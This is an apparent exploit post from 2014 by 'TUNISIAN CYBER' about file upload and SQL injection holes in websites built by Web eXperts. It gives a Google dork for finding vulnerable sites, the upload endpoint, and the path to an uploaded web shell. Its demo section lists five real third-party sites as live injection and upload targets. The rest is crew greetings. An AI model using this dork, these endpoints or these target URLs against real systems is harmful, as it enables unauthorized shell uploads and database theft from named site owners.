facebook facebook twitter rss

Web eXperts FileUpload/SQLi vulnerabilities

Author: TUNISIAN CYBER , Published: 21-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities
[+] Date: 14-01-2014
[+] Category: WebApp
[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com

########################################################################################
+Exploit:
Web eXperts suffers from a File Upload/SQLi vulnerabilities

1/File Upload:
+P.O.C:
127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=

Shell path:
site.ltd/uploads/h4x3d.php.jpg

2/SQli:
127.0.0.1/products.php?category_id=sql

Demo:
http://www.strivesports.com//products.php?category_id=1'
http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.sarsonss.com/products.php?category_id=1'
http://www.sirgeeintl.com/products.php?category_id=1'

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :